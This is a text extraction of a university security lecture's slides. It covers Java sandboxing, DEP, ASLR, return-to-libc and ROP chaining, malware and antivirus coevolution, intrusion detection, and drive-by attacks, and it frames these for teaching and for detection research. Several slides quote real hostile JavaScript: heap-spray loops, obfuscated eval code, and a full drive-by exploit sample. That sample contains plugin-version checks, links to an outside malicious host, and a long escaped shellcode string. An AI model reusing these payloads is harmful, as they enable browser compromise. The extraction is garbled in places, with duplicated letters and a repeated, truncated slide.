CO CO 447 | LEC3 SECU CURE DE DESIGN PRINCI CIPLES JAVA SECU - - PowerPoint PPT Presentation

CO CO 447 | LEC3

SECU CURE DE DESIGN PRINCI CIPLES JAVA SECU CURITY ROP AND D ADVANCE CED D EX EXPL PLOITS

• Dr. Ben Livshits

Java and Native Interactions

¨ Possible to compile

bytecode class file to native code

¨ JITs are used for

performance

¨ Java programs can call

native methods, typically functions written in C

¨ C# and .NET take C/C++

interop very seriously

2

class PlatformInvokeTest { [DllImport("msvcrt.dll")] public static extern int puts(string c); [DllImport("msvcrt.dll")] internal static extern int _flushall(); public static void Main() { puts("Test"); _flushall(); } }

Java Security Mechanisms

¨ Sandboxing

¤ Run program in restricted

environment

¤ Analogy: child’s sandbox with

• nly safe toys

¤ This term refers to features of

loader, verifier, interpreter that restrict program

¨ Code signing

¤ Use cryptography to establish

• rigin of class file

¤ This info can be used by security

manager

¨ Class loader

¤ Separate namespaces for separate class loaders ¤ Associates protection domain with each class

¨ Verifier and JVM run-time tests

¤ NO unchecked casts or other type errors ¤ NO buffer/array overflows ¤ Preserves private, protected visibility levels

¨ Security Manager

¤ Called by library functions to decide if request is

allowed

¤ Uses protection domain associated with code, user

policy

¤ Coming up in a few slides: stack inspection

Security Manager

¨ Java library functions call Security Manager ¨ Security manager object answers at run time

¤ Decide if calling code is allowed to do operation ¤ Examine protection domain of calling class

n Signer: organization that signed code before loading n Location: URL where the Java classes came from

¤ Uses the system policy to decide access permission

Sample Security Manager Methods

checkExec Checks if the system commands can be executed. checkRead Checks if a file can be read from. checkWrite Checks if a file can be written to. checkListen Checks if a certain network port can be listened to for connections. checkConnect Checks if a network connection can be created. checkCreate ClassLoader Check to prevent the installation of additional ClassLoaders.

Stack Inspection

¨ Permission depends on

¤ Permission of calling

method

¤ Permission of all

methods above it on stack

¤ Up to method that is

trusted and asserts this trust

java.io.FileInputStream method f method g method h

Java: Things Didn’t Quite Go According to Plan

7

An Analyzing Ja Java Explo loit its

8 https://www.abartel.net/static/p/ccs2016-10yearsJavaExploits.pdf

Ba Back to

• Na

Native Cod Code…

¨ Buffer overruns: Stack, Heap

9

DE DEP

10 10

¨ Hardware-enforced execution

prevention technique

¨ Breaks the basics of memory

exploitation

¨ Specifically, stacks and heaps become

non-executable or NX

¨ So, can’t lo

load your shellcode there

¨ But… can jump to ex

existing (shell-) code

EI EIP Limitations

¨ Return-to-libc ¨ Pioneered in 1997 ¨ EIP returns to an

existing function

¨ Need control of the

stack to place parameters there

¨ Typically, the stack is

writeable

11 11

Program image Heap Stack DLL DLL

DE DEP and ASLR

Address space layout randomization (ASLR) is a memory- protection process for

• perating systems

(OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.

12 12

https://www.zdnet.com/article/microsoft-says-aslr-behavior-in-windows-10-is-a-feature-not-a-bug/

Re Return-to to-lib libc fo for system

13 13

https://www.slideshare.net/saumilshah/dive-into-rop

¨

It's possible to invoke an arbitrary function simply by placing a fake frame in stack memory

¨

It’s possible to retain EIP control after the function return

¨

Ret2LibC forms the basis of return-oriented- programming

Func Function n Calls

void add(int x, int y){ int sum; sum = x+y; printf(“%d\n”, sum); } int main(){ add(3,4); }

14 14

frame for add() return address from add() 3 4 ESP

Ov Overflow the Buffer and Call add()

void overflow(char* s){ char buffer[128]; strcpy(buffer, s); } int main(){

• verflow(argv[1]);

}

15 15

buffer return address from overflow parameter s

Ca Calls and Returns

Call

¨ push return address

• n the stack

¨ set up the stack

¤ move ESP ahead ¤ push EBP ¤ mov ESP to EBP

¨ Function return

¤ Leave

n Restore EBP=POP EBP n MOV EBP to ESP

¤ ret – return control

back to the calling function

n Return address stored

earlier on the stack

n POP EIP

16 16

Be Befor

• re the RE

RET Instruction

• n

17 17

buffer AAAA AAAA

AAAAA AAAAA AAAAA AAAAA AAAAA AAAAA AAAAA AAAAA AAAAA AAAAA

buffer AAAA AAAA ESP

Af After the RET Instruction

¨ To return to add()

¤ Insert a fake frame in

the buffer

¤ Make overflow()

return to add(01010101, 02020202)

¤ What is the stack

layout?

18 18

buffer AAAA AAAA ESP EIP=0x41414141

Ca Calling add() Throu

• ugh overflow()

¨ By carefully crafting a frame ¨ We can have a program

return to our fu functi tion of f cho choice ce

¨ We control the pa

parame meter ers

¨ We also control where to

jump af after the return

19 19

buffer address of add() return address from add()

AAAAA AAAAA AAAAA AAAAA AAAAA

01010101 02020202

Be Before/after RET in overflow() Called

20 20

buffer address of add() return address from add()

AAAAA AAAAA AAAAA AAAAA AAAAA

01010101 02020202 ESP buffer address of add() return address from add()

AAAAA AAAAA AAAAA AAAAA AAAAA

01010101 02020202 ESP EIP

Ch Chaining Multiple Function

• n Ca

Calls

21 21

AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA address of add() address of POP/POP/RET 01010101 02020202 address of add() 42424242 03030303 04050404 Return from overflow() return to add() return to POP/POP/RET POP POP return to add() EIP = 0x42424242 ESP

RO ROP Design Principles

22 22

¨ Piece together pieces of code ¨ Gadgets – primitive operations ¨ These are found in existing binaries to dodge DEP ¨ Can be the primary binary or the associated shared

libraries

¨ Every gadget must end with RET (takes us to the

next chained gadget)

¨ We find gadgets in function epilogues

EI EIP vs. ESP in ROP

¨ N ops=N instructions ¨ EIP increments ¨ ESP fluctuates ¨ The CPU increments EIP

automatically

¨ N ops=N frames ¨ ESP increments ¨ EIP fluctuates ¨ We control ESP via ret

instructions

23 23

Cl Classic EIP code RO ROP code

Ga Gadgets Gl Glued Tog

• gether

24 24

https://www.slideshare.net/saumilshah/dive-into-rop

Ga Gadget Di Diction

• nary

25 25

Ho How w to

• Find Gadgets?

¨ Disassemble code (binary +

DLLs)

¨ Identify useful code

sequences ending in ret as potential gadgets

¨ Assemble gadgets into

desired shellcode

¨ Return-Oriented

Programming: Systems, Languages, and Applications by Ryan Roemer, Erik Buchanan, Hovav Shacham and Stefan Savage

¨ Shacham et al. manually

identified which sequences ending in ret in libc were useful gadgets

¨ Common shellcode was

created with these gadgets.

¨ Everyone used libc, so

gadgets and shellcode universal

26 26

Pu Putting This All Together

27 27

¨ Several gadget compilers exist ¨ one example is ROPgadget on GitHub

Ge Generating ROP Ch Chains

28 28

Ro Ropgadet dem demo

29 29

¨ https://youtu.be/MSy0rdi1vbo

Qu Quiz

30 30

¨ https://piazza.com/class/k0r3cj25uu0137

Malware

31 31

Malware: Different Types

¨

A virus is a computer program that is capable of ma making copies of itself and inserting those copies into other programs.

¨

A worm is a virus that uses a ne network to copy itself onto other computers.

¨

Sp Spyware is software that aids in gathering information about a person or organization without their knowledge and that may send such information to another entity

¨

A Tr Trojan often acts as a backdoor, contacting a controller which can then have unauthorized access to the affected computer.

¨

A dr drive-by by-do downl nload attack is a malware delivery technique triggered when the user visits a website.

32

Wa Wait, There’s Mo More

33

Ma Malware Volume

34

The AV-TEST Institute registers over 450,000 new malicious programs every day

http://www.av-test.org/en/statistics/malware/

A A Lot of Commercial Ac Activity

35

Cyber Security Market worth $155.74 Billion by 2019

http://www.marketsandmarkets.com/PressReleases/cyber-security.asp

What is a Virus?

a program that can in infect

• ther programs by modifying

them to include a, possibly ev evolved, version of itself

Fred Cohen, 1983

Br Brief Histor

• ry of
• f Malware

37

Mac users can often be heard to say “I don’t need antivirus software, I have an Apple”. Unfortunately, this is a misguided conclusion. Whilst the dangers are certainly much less than with Windows computers, they do exist nonetheless. Mac users who think they do not need to concern themselves have created an illusion. The claim that Apple users are less threatened than Windows users is currently still correct, but could change rapidly. It was the low market share of Macs that limited the attentions of online criminals; now that Macs are becoming more popular, this state of affairs is changing. http://www.itsecuritywatch.com/

Coevolution: Basic Setup

¨ Wait for user to execute an

infected file

¨ Infect other (binary) files by

modifying them

¨ Spread that way

¨ Identify a sequence of

instructions or data

¨ Formulate a signature ¨ Scan all files ¨ Look for signature found

ve verbatim

¨ Bottleneck: scanning

speed

38

Vi Virus

An Antivirus

Si Signatures

39

Si Sign gnatures es Ar Are e Updated ed Al All The e Time me

40

Coevolution: Entry Point Scanning

¨

Place virus at the entry point or make it directly reachable from the entry point

¨

Make virus small to avoid being easily noticed by user

¨ Entry point scanning ¨ Do exploration of

reachable instruction starting with the entry point of the program

¨ Continue until no more

instructions are found

41

Vi Virus An Anti tivirus

Coevolution: Virus Encryption

¨

Decryption routine

¨

Virus body

¨

Decrypt into memory, not do disk

¨

Set PC to the beginning of the decryption buffer

¨

Encrypt with a different key before adding virus to new executable

¨

Decryption (and encryption) routines (packers) used by viruses are easy to fingerprint

¨

Develop si signatures to match these ro routines

¨

Attempt to decrypt the virus body to perform a secondary verification (x-raying)

42

Vi Virus An Anti tivirus

D E

Si Simple Decryption Routine

43

Ju Jumping Ahead: Similar r Behavior r in Ja JavaScri ript pt

44

Coevolution: Polymorphic

¨

Use a mutation engine to generate a (decryption routine, encryption routine) pair

¨

Functionally similar or the same, but syntactically very different

¨

Use the encryption routine to encode the body of the virus

¨

No fixed part of the virus preserved (decryption, encryption, body)

¨

Custom detection program designed to recognize specific detection engines

¨

Generic decryption (GD)

¤ Emulator ¤ Signature matching engine ¤ Scan memory/disk at regular intervals

in hopes of finding decoded virus body

45

Vi Virus An Anti tivirus

D1

E 1

D2

E 2

Em Emulation Challenges

46

¨ How long to emulate the execution? Viruses use

pa paddi dding ng instructions to delay execution. Can also use sl sleep for a while to slow down the scanner.

¨ What is the quality of the emulator? How many CPUs

to support?

¨ What if decryption starts upon user interactions? How

do we trigger it?

¨ What about anti-emulation tricks?

AV: Static and Runtime

¨ Signature-based virus

detection – static techniques

¨ Emulation-based

detection – runtime technique

¨ Generally, both are

used at the same time (hybrid)

47

Fa False Positives

48

• A "false positive" is when antivirus software identifies a non-malicious file as a virus.

When this happens, it can cause serious problems.

• For example, if an antivirus program is configured to immediately delete or

quarantine infected files, a false positive in an essential file can render the operating system or some applications unusable.

¤

In May 2007, a faulty virus signature issued by Symantec mistakenly removed essential operating system files, leaving thousands of PCs unable to boot

¤

Also in May 2007, the executable file required by Pegasus Mail was falsely detected by Norton AntiVirus as being a Trojan and it was automatically removed, preventing Pegasus Mail from running. Norton anti-virus had falsely identified three releases of Pegasus Mail as malware, and would delete the Pegasus Mail installer file when that happened n response to this Pegasus Mail stated:

¤

On the basis that Norton/Symantec has done this for every one of the last three releases of Pegasus Mail, we can only condemn this product as too flawed to use, and recommend in the strongest terms that our users cease using it in favor of alternative, less buggy anti-virus packages

More False Positives

49

¨

In April 2010, McAfee VirusScan detected svchost.exe, a normal Windows binary, as a virus on machines running Windows XP with Service Pack 3, causing a reboot loop and loss of all network access

¨

In December 2010, a faulty update on the AVG anti-virus suite damaged 64-bit versions of Windows 7, rendering it unable to boot, due to an endless boot loop created

¨

In October 2011, Microsoft Security Essentials removed the Google Chrome browser, rival to Microsoft's own Internet

• Explorer. MSE flagged Chrome as a Zbot

banking trojan

Fa False Alarms

50

Vu Vulnerability Gap

51

¨

As long as user has the right virus signatures and computer has recently been scanner, detection will likely work

¨

But the virus landscape changes fast

¨

This calls for monitoring techniques for unknown viruses

http://www.m86security.com/documents/pdfs/security_labs/m86_security_labs_vulnerability_report.pdf

Li Limitations of AV

52

¨ Reactive approach renders existing security

solutions less effective, because they are too slow to respond and require up-to-date signatures, before they can be effective

¨ While the reactive signature approach provides

adequate identification of existing attacks, it is virtually useless in protecting against new and unknown attacks

Ma Malwarebytes: N : Not S Signature-Bas Based ed

53

https://www.youtube.com/watch?v=PGLGyPuxP7c

IDS: Intrusion Detection Systems

¨ Collect signals ¨ Build a model of

normal (and abnormal behavior)

¨ Process logs and

create alerts

¨ Notify system

• perators

¨ Behavioral models can

be quite complex

¨ Are often graph-based ¨ Or regex-based ¨ Influence false positive

and false negative rates

54

Host-Based vs. Network-Based IDS

¨ Log analyzers ¨ Signature-based

sensors

¨ System call analyzers ¨ Application behavior

analyzers

¨ File integrity checkers ¨ Scan incoming and

• utgoing traffic

¨ Primarily signature-

based

¨ Combined into

firewalls

¨ Can be located on a

different machine

55

Sy Syste tem Call Log

56

11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] mmap 11:33:27;[pid 1286] close 11:33:27;[pid 1286] close 11:33:27;[pid 1286] munmap 11:33:27;[pid 1286] open 11:33:27;[pid 1286] ioctl 11:33:27;[pid 1286] close 11:33:27;[pid 1286] nice 11:33:27;[pid 1286] auditon 11:33:27;[pid 1286] open 11:33:27;[pid 1286] ioctl 11:33:27;[pid 1286] close 11:33:27;[pid 1286] open 11:33:27;[pid 1286] ioctl

Re Registry Access Log

57

Host-Based Intrusion Detection

Entry(f) Entry(g) Exit(f) Exit(g)

• pen()

close() exit() getuid() geteuid()

f(int x) { x ? getuid() : geteuid(); x++ } g() { fd = open("foo", O_RDONLY); f(0); close(fd); f(1); exit(0); }

If the observed code behavior is inconsistent with the statically inferred model, something is wrong

Drive-by malware

Brief History of Memory-Based Exploits

60 60

Memory- based exploits

2000 Stack-based overruns

2002 Heap-based overruns 2005 Drive-by attacks and heap sprays

1999: Melissa 2001: CodeRed 2002: Nimda

What is a Drive-By Attack?

61 61

0wned!

62 62

<SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...'');

• neblock = unescape("%u0C0C%u0C0C");

var fullblock = oneblock; while (fullblock.length<0x40000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT>

• k

bad

• k

Browser Heap

bad bad bad bad bad

Allocate 1,000s of malicious objects

Drive-By Attack Example: Heap Spraying

Heap Spraying

63 63

Firefox 3.5 July 14, 2009

http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html

Adobe Acrobat / Reader February 19, 2009

http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html

Mo More Complex Ma Malware

64 64

Drive-by downloads This is one of key reasons why browser vulnerabilities are so valuable

65 65

As Aspects of Drive-By By Malware

¨ Attacks ¤ Browser ¤ What is mostly affected? ¤ Browser plugins ¤ What is affected in

plugins? Why plugins are most open to exploitation?

¨ Vulnerabilities ¤ Dangling pointers ¤ Double frees ¤ Buffer overruns are harder ¨ Malware is highly

• bfuscated

¨ Obfuscation changes all

the time

67

OlOlll="(x)"; OllOlO=" String"; OlllOO="tion"; OlOllO="Code(x)}"; OllOOO="Char"; OlllOl="func"; OllllO=" l = "; OllOOl=".from"; OllOll="{return"; Olllll="var"; eval(Olllll+OllllO+OlllOl+Olll OO+OlOlll+OllOll+OllOlO+OllOOl +OllOOO+OlOllO);

Ob Obfuscation

var l = function(x) { return String.fromCharCode(x); }

shellcode = unescape("%u54EB%u758B…"); var bigblock = unescape("%u0c0c%u0c0c"); while(bigblock.length<slackspace) { bigblock += bigblock; } block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) { block = block + block + fillblock; } memory = new Array(); for(x=0; x<300; x++) { memory[x] = block + shellcode; …

68

eval(l(79)+l(61)+l(102)+l(117) +l(110)+l(99)+l(116)+l(105)+l( 111)+l(110)+l(40)+l(109)+l(41) +l(123)+l(114)+l(101)+l(116)+l (117)+l(114)+l(110)+l(32)+l(83 )+l(116)+l(114)+l(105)+l(110)+ l(103)+l(46)+l(102)+l(114)+l(1 11)+l(109)+l(67)+l(104)+l(97)+ l(114)+l(67)+l(111)+l(100)+l(1 01)+l(40)+l(77)+l(97)+l(116)+l (104)+l(46)+l(102)+l(108)+l(11 1)+l(111)+l(114)+l(40)+l(109)+ l(47)+l(49)+l(48)+l(48)+l(48)+ l(48)+l(41)+l(47)+l(50)+l(41)+ l(59)+l(125)); eval(""+O(2369522)+O(1949494)+ O(2288625)+O(648464)+O(2304124 )+O(2080995)+O(2020710)+O(2164 958)+O(2168902)+O(1986377)+O(2 227903)+O(2005851)+O(2021303)+ O(646435)+O(1228455)+O(644519) +O(2346826)+O(2207788)+O(20231 27)+O(2306806)+O(1983560)+O(19 49296)+O(2245968)+O(2028685)+O (809214)+O(680960)+O(747602)+O (2346412)+O(1060647)+O(1045327 )+O(1381007)+O(1329180)+O(7458 97)+O(2341404)+O(1109791)+O(10 64283)+O(1128719)+O(1321055)+O (748985)+...);

Mo More Obfuscated Code

69 69

Malzilla

70 70

Malzilla (2)

71 71

Decoders

72 72

Disassemble?

73 73

And More

74 74

Ru Runtime De Deobfuscation vi via Co Code Un Unfolding

75 75

eval(""+O(2369522)+O(1949 494)+O(2288625)+O(648464) +O(2304124)+O(2080995)+O( 2020710)+O(2164958)+O(216 8902)+O(1986377)+O(222790 3)+O(2005851)+O(2021303)+ O(646435)+O(1228455)+O(64 4519)+O(2346826)+O(220778 8)+O(2023127)+O(2306806)+ O(1983560)+O(1949296)+O(2 245968)+O(2028685)+O(8092 14)+O(680960)+O(747602)+O (2346412)+O(1060647)+O(10 45327)+O(1381007)+O(13291 80)+O(745897)+O(2341404)+ O(1109791)+O(1064283)+O(1 128719)+O(1321055)+O(7489 85)+...);

JavaScript runtime in browser

Deobfuscator

Malicious PDFs

76

http://sandsprite.com/blogs/index.php?uid=7&pid=57

Unpacking It Some More

77

Detection Approaches

¨ Static analysis of

JavaScript?

¨ What are the

challenges?

¨ Observe execution ¨ Watch in-browser

behavior

¨ Watch OS effects ¨ Run in a VM

78 78

Ho How to Recognize JavaScript Malware?

• 1. Look at representative

malware

• 2. Find commonalities
• 3. Encode them as features

79

See Anything in Common

80 80

See Anything in Common

while (cTAfWBbz.length < EibcUrHC / xAFKNqwO) {

delete cTAfWBbz; for (JyxIaABZ = 0; JyxIaABZ < oKqMlPqL; JyxIaABZ++) { pbIkPrKa[JyxIaABZ] = GBVpRAcd + eSSOLKOd; } CollectGarbage();

for (var FNMszcqR = 0; FNMszcqR < wSqaQK; FNMszcqR++) wxDSxsOR.push(document.createElement("img"));

81 81

How About This?

var zmn = null; try { zmn = new ActiveXObject("AcroPDF.PDF"); } catch (e) {} if (!zmn) { try { zmn = new ActiveXObject("PDF.PdfCtrl"); } catch (e) {} } if (zmn) { lv = ((zmn.GetVersions().split(","))[4].split("="))[1].replace(/\./g, ""); if ((lv < 900) && (lv != 813)) document.write('<embed src="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=2" width=100 height=100 type="application/pdf"></embed>'); } try { var zmn = 0; zmn = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$" + "version").split(","); } catch (e) {} if (zmn && (zmn[2] < 124)) document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle><param name="movie" value="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=3"/><param name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=3"/></embed></object>'); var scode = "%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u61 87%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF% u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEF EF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA %uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%u FF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C6 4%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364 %u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1"; function ek13() { return true; } window.onerror = ek13; var scode1 = unescape(scode + "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u 252B%u3632%u4D2B%u3350%u733F%u453D%u7159%u6735%u4337%u2667%u6469%u313D%u0032");

82 82

How About This?

var zmn = null; try { zmn = new ActiveXObject("AcroPDF.PDF"); } catch (e) {} if (!zmn) { try { zmn = new ActiveXObject("PDF.PdfCtrl"); } catch (e) {} } if (zmn) { lv = ((zmn.GetVersions().split(","))[4].split("="))[1].replace(/\./g, ""); if ((lv < 900) && (lv != 813)) document.write('<embed src="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=2" width=100 height=100 type="application/pdf"></embed>'); } try { var zmn = 0; zmn = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$" + "version").split(","); } catch (e) {} if (zmn && (zmn[2] < 124)) document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle><param name="movie" value="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=3"/><param name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=3"/></embed></object>'); var scode = "%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u61 87%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF% u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEF EF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA %uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%u FF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C6 4%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364 %u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1"; function ek13() { return true; } window.onerror = ek13; var scode1 = unescape(scode + "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u

83 83

Detecting Internet Malware

84 84

Dynamic Detection

Nozzle

Static Detection

Zozzle

Nozzle: A Defense Against Heap-spraying Code Injection Attacks [Usenix Security 2009]

• Scan heap allocated objects to identify valid x86 code

sequences

Zozzle: Low-overhead Mostly Static JavaScript Malware Detection

[Usenix Security 2011]

• Bayesian classification of hierarchical features of the

JavaScript abstract syntax tree. In the browser (after unpacking)

6/1/2011 6/3/2011 6/5/2011 6/7/2011 6/9/2011 6/11/2011 6/13/2011 6/15/2011 6/17/2011 6/19/2011 6/21/2011 6/23/2011 6/25/2011 6/27/2011 6/29/2011